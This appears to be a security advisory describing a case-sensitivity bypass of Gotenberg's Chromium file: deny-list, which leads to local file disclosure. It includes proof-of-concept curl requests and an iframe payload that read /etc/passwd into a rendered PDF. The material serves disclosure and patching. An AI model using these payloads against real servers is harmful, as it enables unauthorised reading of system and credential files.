The fix introduced in version 8.1.0 for GHSA-rh2x-ccvw-q7r3 (CVE-2024-21527) can be bypassed using mixed-case or uppercase URL schemes.
The default --chromium-deny-list value is ^file:(?!//\/tmp/).*. This regex is anchored to lowercase file: at the start. However, per RFC 3986 Section 3.1, URI schemes are case-insensitive. Chromium normalizes the scheme to lowercase before navigation, so a URL like FILE:///etc/passwd or File:///etc/passwd bypasses the deny-list check but still gets resolved by Chromium as file:///etc/passwd.
The root cause is in pkg/gotenberg/filter.go — the FilterDeadline function compiles the deny-list regex with regexp2.MustCompile(denied.String(), 0), where 0 means no flags (case-sensitive). Since the regex pattern itself doesn't include a (?i) flag, matching is strictly case-sensitive.
This affects both the URL endpoint and HTML conversion (via iframes, link tags, etc.).
docker run --rm -p 3000:3000 gotenberg/gotenberg:8.26.0 gotenberg
/etc/passwd via the URL endpoint using an uppercase scheme:curl -X POST 'http://localhost:3000/forms/chromium/convert/url' \
--form 'url=FILE:///etc/passwd' -o output.pdf
Open output.pdf — it contains the contents of /etc/passwd.
Alternatively, create an index.html:
<iframe src="FILE:///etc/passwd" width="100%" height="100%"></iframe>
Then convert it:
curl -X POST 'http://localhost:3000/forms/chromium/convert/html' \
-F 'files=@index.html' -o output.pdf
/etc/passwd contents.Mixed-case variants like File:, fILE:, fiLE: etc. all work as well.
pkg/modules/chromium/chromium.go defines the default deny-list as ^file:(?!//\/tmp/).*pkg/gotenberg/filter.go compiles this with regexp2.MustCompile(denied.String(), 0) — flag 0 means case-sensitive
-...8.29.0Exploitability
AV:NAC:LAT:NPR:NUI:NVulnerable System
VC:HVI:LVA:NSubsequent System
SC:NSI:NSA:N7.8/CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:P